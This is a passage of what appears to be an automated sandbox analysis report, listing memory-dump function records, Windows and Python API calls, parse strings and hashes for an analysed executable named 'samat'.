                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                      • Opcode ID: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                                                                      • Instruction ID: 3d4155d7d2cd958bd72502162b4ac7fdd9e655a56eb56c5e6449df122de90c34
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdca0e5d1be44ae5d3d1eb4e4dfe397437606097ef32224e0533ff711b04112
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26210B63B0828145EB20AB21D84536DB3A9FB84B48FC54037D65D43A94DFBCE5458BA6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: PyImport_ImportModule.PYTHON313 ref: 00007FF8B7E89AD1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: PyObject_GetAttrString.PYTHON313 ref: 00007FF8B7E89AED
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B04
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: PyTuple_New.PYTHON313 ref: 00007FF8B7E89B11
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: PyObject_CallMethod.PYTHON313 ref: 00007FF8B7E89B30
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B4B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E89AB0: _Py_Dealloc.PYTHON313 ref: 00007FF8B7E89B66
                                                                                                                                                                                                                                                                                      • PyObject_GetAttrString.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A444
                                                                                                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,?,?,?,?,?,?,00007FF8B7E89C6D), ref: 00007FF8B7E8A4A8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$Object_$AttrString$CallImportImport_MethodModuleTuple_
                                                                                                                                                                                                                                                                                      • String ID: max
                                                                                                                                                                                                                                                                                      • API String ID: 66079785-2641765001
                                                                                                                                                                                                                                                                                      • Opcode ID: c7742cccba0b74eac24001ffb7e123acc52cb9acd810040e86681d1a68a09f60
                                                                                                                                                                                                                                                                                      • Instruction ID: 4c5957d4a6b28adc87e853db6135c5bd57e0f6dedcea5f9d7e6f31aed064d4ff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7742cccba0b74eac24001ffb7e123acc52cb9acd810040e86681d1a68a09f60
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54110626A0879692EB548F1AE54413DB3A1FF84FD5F484131EB9E06AA9EF3CE460C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E89C02
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E86460: PyLong_AsLongLong.PYTHON313 ref: 00007FF8B7E86485
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E86460: PyErr_Occurred.PYTHON313 ref: 00007FF8B7E86494
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32 ref: 00007FF8B7E89C39
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_LongTime$Arg_BuildDecodeErrorFileFormatFreeLastLocalLong_MessageObjectOccurredParseSystemTupleUnicode_Value
                                                                                                                                                                                                                                                                                      • String ID: FileTimeToSystemTime
                                                                                                                                                                                                                                                                                      • API String ID: 1618908028-1754531670
                                                                                                                                                                                                                                                                                      • Opcode ID: 99e37812b2323da1d358adf734d79309d4d6e63afb47562442355d7a361db807
                                                                                                                                                                                                                                                                                      • Instruction ID: f771f1ce3abe2fcfe2fc949608e91523e654cb9e610931bd5d17fae38df4b1ed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99e37812b2323da1d358adf734d79309d4d6e63afb47562442355d7a361db807
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41113062A18B4296FB90EB29E45106E73A1FFC5FC8FC41032E74E86676EE3CD5058B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                      • Instruction ID: 1863c94761d3cd37f162583b0d1044e7a7f6754c115aebc7d930312b3f650e75
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2115E32608B8182EB219F15E840399B7E8FB88B84F584232DB8D07754DF7CC551C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: AddAccessDeniedObjectAce$lllOOO:AddAccessDeniedObjectAce
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-3179976129
                                                                                                                                                                                                                                                                                      • Opcode ID: e3dfeb46af7c84d4519f2e145db967f80bf3f2d84102a64a761ca55c8579d974
                                                                                                                                                                                                                                                                                      • Instruction ID: a3d5a6c7775e39bd7cab7f618c1e7b0259a2ff724fab779546ea92e75c6170da
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3dfeb46af7c84d4519f2e145db967f80bf3f2d84102a64a761ca55c8579d974
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28111676A08B4582DB10CF55E4445AD73A4FB88BD4F510136EAAD83B24EB3DDA98CB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: AddAccessAllowedObjectAce$lllOOO:AddAccessAllowedObjectAce
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-684429688
                                                                                                                                                                                                                                                                                      • Opcode ID: d8f714f13fb6f6a21b8a46a53381e791b01951d00187e0f0dc706bbcebc28b78
                                                                                                                                                                                                                                                                                      • Instruction ID: 6488975d714bc58351363c187621eb112e284fb516a214bf5231c043db1f5f59
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8f714f13fb6f6a21b8a46a53381e791b01951d00187e0f0dc706bbcebc28b78
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA111676708B8582DB10CB55E4845AD73A4FB88BD4F510136EAAD83B24EF3DD998CB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                      • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                      • Instruction ID: bb244cd4ccd4689cf73846cbc48848b3004b054a83a1bceda0c2ca526cca3462
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0701D422B1C20386F725BF60982337EA3A4EF48344FC44037D94D86681DEBCE5018B2A
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeallocSequence_Tuple
                                                                                                                                                                                                                                                                                      • String ID: Sequence can contain at most %d items
                                                                                                                                                                                                                                                                                      • API String ID: 1991852567-3507602910
                                                                                                                                                                                                                                                                                      • Opcode ID: ba9606983f3295d13d172f3df34be46ad0d38ebee954a0bfa1b3dec53b8fac5d
                                                                                                                                                                                                                                                                                      • Instruction ID: f58d452fc84f9dfe908248262ca9eb06cc0bb07b9e5282869651d9a617e23cc9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba9606983f3295d13d172f3df34be46ad0d38ebee954a0bfa1b3dec53b8fac5d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F019A3E19B42C2EB198F5AA54053C63A1EF99FD4F481132DB1D077B6DE3CD4918710
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: AddMandatoryAce$kkkO:AddMandatoryAce
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-3675006617
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b493b86a8402f20ddd570d78824f01e47810dec285230cae9a0e7602c506f2d
                                                                                                                                                                                                                                                                                      • Instruction ID: 1c1894b6f13207aad8ad32f110c425a4e63c99acdc9ba29bcf7d6bdb363d36d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b493b86a8402f20ddd570d78824f01e47810dec285230cae9a0e7602c506f2d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA01DA76A0874597EB10CB69F4404AA77A4FB88BD4F540226EB9C93B29DF3CD295CF00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: AddAccessDeniedAceEx$lllO:AddAccessDeniedAceEx
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-4150984663
                                                                                                                                                                                                                                                                                      • Opcode ID: de81793985394db8eda63548ea9406e6c785a4610c77cab919a9f42de7ceaeda
                                                                                                                                                                                                                                                                                      • Instruction ID: 8488f432ca62670dcd5df9d21554257e982ba80964aafb268a499dd878b83b0e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de81793985394db8eda63548ea9406e6c785a4610c77cab919a9f42de7ceaeda
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01DE76A1874596EB10CB69F4404AA77A4FB88BD4F540226EB9C43B25DF3CD255CF00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                                                      • String ID: :OVERLAPPED
                                                                                                                                                                                                                                                                                      • API String ID: 709158290-1552635527
                                                                                                                                                                                                                                                                                      • Opcode ID: 99eac4c21a0de1c82c8a4d1f398764541f69fd89d1bf1e656bce4408f3be1879
                                                                                                                                                                                                                                                                                      • Instruction ID: bd5b0b4437fdff76880473b47c8f2744cdd6ddc80756c2847508abbf5a24a32d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99eac4c21a0de1c82c8a4d1f398764541f69fd89d1bf1e656bce4408f3be1879
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC011A22A18B8182E7148F25E98016D73E8FF99B88F955239DB8D43725EF3CD5A0C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseTuple
                                                                                                                                                                                                                                                                                      • String ID: AddAccessAllowedAceEx$lllO:AddAccessAllowedAceEx
                                                                                                                                                                                                                                                                                      • API String ID: 3371842430-1263352432
                                                                                                                                                                                                                                                                                      • Opcode ID: 8ed8396cbea493bc20a4220841801d33528b5f207fb43b7afe4ccf89f4662698
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e7feeda1bb333818d36831583fa27145ed3723e308cb756d03f0d994616d240
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ed8396cbea493bc20a4220841801d33528b5f207fb43b7afe4ccf89f4662698
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15011A76A08741D2EB10CB68F4400AA77A4FB88BD4F540222EB8C83B28DF3CD294CF00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8B1A0: PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8B1DA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8B1A0: PyErr_SetString.PYTHON313 ref: 00007FF8B7E8B1F9
                                                                                                                                                                                                                                                                                      • PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D05C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyNumber_Long.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEC5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CED3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEF0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Clear.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CEFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyLong_AsUnsignedLongLong.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF04
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Occurred.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF13
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF2C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8CEB0: PyErr_Format.PYTHON313(?,?,?,00007FF8B7E850DE), ref: 00007FF8B7E8CF4B
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E8D092
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Resource id/name must be unicode or int in the range 0-65536, xrefs: 00007FF8B7E8D081
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
